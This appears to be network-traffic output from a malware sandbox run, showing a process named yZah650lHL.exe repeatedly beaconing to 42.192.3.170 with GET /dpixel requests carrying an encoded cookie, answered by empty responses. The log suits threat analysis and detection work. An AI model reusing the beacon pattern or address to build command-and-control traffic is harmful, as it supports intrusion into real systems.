                  2025-01-03 01:54:20 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:20 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:20 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  74 | 192.168.2.4 | 50077 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:21 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:22 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:22 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  75 | 192.168.2.4 | 50078 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:23 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:24 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:24 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  76 | 192.168.2.4 | 50079 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:25 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:26 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:26 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  77 | 192.168.2.4 | 50080 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:27 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:28 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:28 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  78 | 192.168.2.4 | 50081 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:29 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:30 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:30 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  79 | 192.168.2.4 | 50082 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:31 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:32 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:32 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  80 | 192.168.2.4 | 50083 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:33 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:34 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  81 | 192.168.2.4 | 50084 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:35 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:36 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:36 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  82 | 192.168.2.4 | 50085 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:37 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:38 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:38 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  83 | 192.168.2.4 | 50086 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:39 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:40 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  84 | 192.168.2.4 | 50087 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:41 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:41 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:41 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  85 | 192.168.2.4 | 50088 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:43 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:43 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:43 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  86 | 192.168.2.4 | 50089 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:45 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:45 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:45 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  87 | 192.168.2.4 | 50090 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:47 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:48 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:47 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  88 | 192.168.2.4 | 50091 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:49 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:49 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:49 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  89 | 192.168.2.4 | 50092 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:51 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:51 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:51 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  90 | 192.168.2.4 | 50093 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:53 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:53 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:53 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  91 | 192.168.2.4 | 50094 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:55 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:55 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:55 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  92 | 192.168.2.4 | 50095 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:57 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:57 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:57 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  93 | 192.168.2.4 | 50096 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:59 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:59 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:59 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  94 | 192.168.2.4 | 50097 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:55:01 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:01 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:01 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  95 | 192.168.2.4 | 50098 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:55:03 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:03 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:03 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  96 | 192.168.2.4 | 50099 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:55:04 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:05 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:05 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination Port
                  97192.168.2.45010042.192.3.170443
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:06 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:07 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:07 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  98192.168.2.45010142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:08 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:09 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:09 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  99192.168.2.45010242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:10 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:11 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:11 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  100192.168.2.45010342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:12 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:13 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:13 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  101192.168.2.45010442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:14 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:15 UTC114INHTTP/1.1 200 OK
